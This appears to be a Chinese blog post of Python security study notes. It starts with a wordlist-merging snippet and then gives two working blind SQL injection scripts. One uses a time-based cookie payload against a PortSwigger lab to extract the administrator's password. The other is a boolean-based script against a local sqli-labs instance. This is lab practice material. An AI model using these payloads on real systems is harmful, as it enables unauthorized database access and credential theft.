python学习

python学习笔记

1.使用python脚本整合目录扫描字典

1
2
3
4
5
6
f = open("./2.txt", "a+") #a+表示可读可写但是写入只能追加
lines = f.readlines()  # 读取全部内容 ,并以列表方式返回
for line in open("./1.txt"):
   if line not in lines:
       f.writelines(line)
f.close()

2.burp靶场cookie-sql注入时间盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests

url='https://0a03004a034fb137c4f82c9500f4000c.web-security-academy.net/'
a='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
payload_1= "'%3bselect+case+when+(username='administrator'+and+SUBSTRING(password,{},1)='{}')+then+pg_sleep(10)+else+pg_sleep(0)+end+from+users--"
h={
"Host":"0a03004a034fb137c4f82c9500f4000c.web-security-academy.net",
"Cookie":"session=2mfZwsZHlmyYL2mwPlK0e34AEA021iz7;TrackingId=Y7quZz53LMWRIZbA"
}
for num in range(20):
    for i in a:
        payload=payload_1.format(num,i)
        h["Cookie"]='session=w3v9123vZW4IJxuNRuqJBOJ86sbLcmNb;TrackingId=i1NjLmRNA1lXR2pZ'+payload
        res=requests.get(url,headers=h,timeout=1)
        if str(res.reason) != 'OK':
            print(i,end='')

3.sqli 简单盲注脚本

1
2
3
4
5
6
7
8
9
10
11
import requests
payload='and if(substring(user(),{},1)="{}",1,0)--+'
url1="http://192.168.90.45/sql/Less-8/?id=1'"
b='abcdefghijklmnopqrstuvwxyz'
for i in range(5):
    for c in b:
        url=url1+payload.format(i,c)
        res=requests.get(url=url)
        if "You are in" in res.text:
            print(c,end='')

网络安全
#python
python学习
http://example.com/2022/11/18/python学习/
作者
QY
发布于
2022年11月18日
许可协议